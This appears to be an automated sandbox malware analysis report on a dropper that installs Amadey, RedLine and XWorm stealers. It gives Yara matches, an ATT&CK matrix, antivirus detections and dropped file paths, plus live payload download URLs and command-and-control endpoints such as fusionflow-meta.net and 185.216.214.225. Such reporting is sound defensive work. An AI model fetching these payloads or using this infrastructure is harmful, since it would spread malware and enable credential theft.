Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\Guid\TypeId.exe	Queries volume information: C:\Users\user\AppData\Roaming\Guid\TypeId.exe VolumeInformation
Source: C:\Users\user\Pictures\Illumination.pif	Queries volume information: C:\Users\user\Pictures\Illumination.pif VolumeInformation
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Queries volume information: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe VolumeInformation
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe VolumeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Queries volume information: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe VolumeInformation
Source: C:\Users\user\Windows.exe	Queries volume information: C:\Users\user\Windows.exe VolumeInformation
Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	Queries volume information: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe VolumeInformation
Source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	Queries volume information: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe VolumeInformation
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Queries volume information: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe VolumeInformation
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	Queries volume information: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe VolumeInformation
Source: C:\Users\user\Windows.exe	Queries volume information: C:\Users\user\Windows.exe VolumeInformation
Source: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe	Queries volume information: C:\ProgramData\SmLAztxc1o8yfogkJXrRjbDt.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe VolumeInformation
Source: C:\Users\user\Pictures\Illumination.pif	Queries volume information: C:\Users\user\Pictures\Illumination.pif VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369 VolumeInformation
Source: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	Queries volume information: C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001F048A GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_001F048A

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001E3DA0 GetUserNameA,

4_2_001E3DA0

Source: C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe

Code function: 4_2_001E8C8F GetModuleHandleA,GetVersion,Sleep,std::_Throw_Cpp_error,

4_2_001E8C8F

Source: C:\Users\user\Desktop\trSK2fqPeB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.2.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2225524002.000000001BF84000.00000004.00000020.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2110211021.00000000013F2000.00000004.00000020.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2225524002.000000001BF4D000.00000004.00000020.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2225524002.000000001BFBE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.2.dr	Binary or memory string: MsMpEng.exe

Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.trSK2fqPeB.exe.1ce50324.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.trSK2fqPeB.exe.12b7dbd4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.trSK2fqPeB.exe.12b7d8b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.trSK2fqPeB.exe.12b7d8b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.trSK2fqPeB.exe.12b01a78.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.trSK2fqPeB.exe.1ce50000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.trSK2fqPeB.exe.1ce50324.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.trSK2fqPeB.exe.12b7dbd4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1659763375.000000001CE50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1797088014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1645950276.0000000012B01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match

File source: Process Memory Space: xzzrvckwuia.exe PID: 2688, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 3736, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match

File source: Process Memory Space: xzzrvckwuia.exe PID: 2688, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.13021a78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.FRaqbC8wSA1XvpFVjCRGryWt.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2211716586.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1807181029.0000000000E02000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 3736, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Windows.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe, type: DROPPED

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_004307F8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,		15_2_004307F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 15_2_0042FB01 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		15_2_0042FB01

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	11 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	111 Scheduled Task/Job	512 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	111 Scheduled Task/Job	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	111 Scheduled Task/Job	Login Hook	21 Registry Run Keys / Startup Folder	2 Software Packing	NTDS	167 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	3 PowerShell	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	791 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	221 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	391 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	391 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	512 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
trSK2fqPeB.exe	18%	ReversingLabs	Win32.Trojan.BotX
trSK2fqPeB.exe	32%	Virustotal		Browse
trSK2fqPeB.exe	100%	Avira	TR/Dropper.Gen7

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	100%	Avira	HEUR/AGEN.1313066
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	100%	Avira	TR/Spy.RedLine.avuvz
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	100%	Avira	HEUR/AGEN.1319014
C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	100%	Avira	HEUR/AGEN.1319014
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	100%	Avira	TR/Spy.Gen
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	100%	Avira	HEUR/AGEN.1319014
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	100%	Avira	HEUR/AGEN.1313066
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Roaming\Guid\TypeId.exe	100%	Avira	HEUR/AGEN.1358722
C:\Users\user\Windows.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\Pictures\Illumination.pif	100%	Avira	TR/Dropper.Gen7
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ovrflw[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	100%	Joe Sandbox ML
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	100%	Joe Sandbox ML
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	100%	Joe Sandbox ML
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	100%	Joe Sandbox ML
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Guid\TypeId.exe	100%	Joe Sandbox ML
C:\Users\user\Windows.exe	100%	Joe Sandbox ML
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	96%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe	86%	Virustotal		Browse
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	96%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe	86%	Virustotal		Browse
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.PureLogsStealer
C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	82%	Virustotal		Browse
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.PureLogsStealer
C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe	82%	Virustotal		Browse
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	96%	ReversingLabs	Win32.Trojan.Generic
C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	79%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\52i[1].exe	62%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\ovrflw[1].exe	41%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\kitty[1].exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	79%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000267001\52i.exe	62%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\1000268001\kitty.exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\1000277001\ovrflw.exe	41%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	96%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	86%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\xzzrvckwuia.exe	64%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Guid\TypeId.exe	79%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Roaming\Guid\TypeId.exe	62%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe	41%	Virustotal		Browse
C:\Users\user\Pictures\Illumination.pif	34%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\Pictures\Illumination.pif	32%	Virustotal		Browse
C:\Users\user\Windows.exe	96%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\Windows.exe	86%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
tmpfiles.org	3%	Virustotal	Browse
github.com	0%	Virustotal	Browse
2x.si	16%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
exonic-hacks.com	21%	Virustotal	Browse
rx-eu-lon.unminable.com	0%	Virustotal	Browse
objects.githubusercontent.com	1%	Virustotal	Browse
fusionflow-meta.net	0%	Virustotal	Browse
rx.unmineable.com	2%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tmpfiles.org	104.21.21.16	true	false	3%, Virustotal, Browse	unknown
github.com	140.82.121.4	true	false	0%, Virustotal, Browse	unknown
2x.si	172.67.143.156	true	true	16%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
exonic-hacks.com	185.216.214.225	true	true	21%, Virustotal, Browse	unknown
rx-eu-lon.unminable.com	161.35.34.195	true	true	0%, Virustotal, Browse	unknown
objects.githubusercontent.com	185.199.110.133	true	false	1%, Virustotal, Browse	unknown
fusionflow-meta.net	188.114.96.3	true	true	0%, Virustotal, Browse	unknown
rx.unmineable.com	unknown	unknown	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://fusionflow-meta.net/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADE	true
https://2x.si/vGW.exe	true
https://fusionflow-meta.net/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9ADF	true
https://fusionflow-meta.net/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD1	true
http://185.216.214.225/freedom.exe	true
https://fusionflow-meta.net/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B0A1&us=04C689694C&mn=5F9DD53E0C1F&os=39C08968505B98415E8FB59C9BF11E8FF1C744CD51&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9AD0	true
https://tmpfiles.org/dl/12050075/loli.exe	false
http://185.215.113.19/CoreOPT/index.php	true
http://185.216.214.225/Jhiidutz.exe	true
https://github.com/DamnCrypt/Zd8fux7fzhe2u7w/releases/download/Test/plugin3.dll	false
http://185.215.113.19/CoreOPT/index.php?scr=1	true
185.208.158.139:27667	true

URLs from Memory and Binaries

Name	Source	Malicious
http://185.216.214.225/Jhiidutz.exeGN	Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.phpt	RegAsm.exe, 0000002D.00000002.2148146374.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net:443/socket/345342q&	Cerker.exe, 0000002F.00000003.2493875039.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440307951.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427205502.000000000106D000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.1.dr, qmgr.db.1.dr	false
http://185.216.214.225/Jhiidutz.exexM	Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp	false
http://www.fontbureau.com/designers	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net/_age	Cerker.exe, 0000002F.00000003.2533220270.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440270925.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547379699.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2561516266.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2520979923.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2506644934.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427060889.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/C	Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.sajatypeworks.com	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://2x.si/#	RegAsm.exe, 00000002.00000002.2080894884.00000000014D3000.00000004.00000020.00020000.00000000.sdmp	true
https://fusionflow-meta.net/E	Cerker.exe, 00000008.00000003.1843946160.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000002.2080368416.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1844836338.0000000001707000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/pp-meta.net/Temp	Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod.C:	edb.log.1.dr, qmgr.db.1.dr	false
http://www.founder.com.cn/cn/cThe	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net:443/socket/.)	Cerker.exe, 0000002F.00000002.4109992195.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp	false
https://fusionflow-meta.net/%w	Cerker.exe, 0000002F.00000003.2415497371.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.16/inc/kitty.exe	RegAsm.exe, 00000002.00000002.2080894884.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	false
https://nuget.org/nuget.exe	powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	false
https://discord.com/api/v9/users/	xzzrvckwuia.exe, 00000029.00000002.2145857389.000000000330D000.00000004.00000800.00020000.00000000.sdmp	false
http://ip-api.com	FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp	false
http://www.galapagosdesign.com/DPlease	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://files.catbox.moe/k541xr.dll	aspnet_compiler.exe, 0000001A.00000002.4131368164.0000020D46C13000.00000004.00000800.00020000.00000000.sdmp	false
http://www.urwpp.deDPlease	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
http://www.zhongyicts.com.cn	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
http://www.googlebot.com/bot.html)	ovrflw.exe, 00000012.00000002.1851294717.0000000002651000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000013.00000002.2064032593.0000000003291000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000020.00000002.1954592893.0000000002971000.00000004.00000800.00020000.00000000.sdmp	false
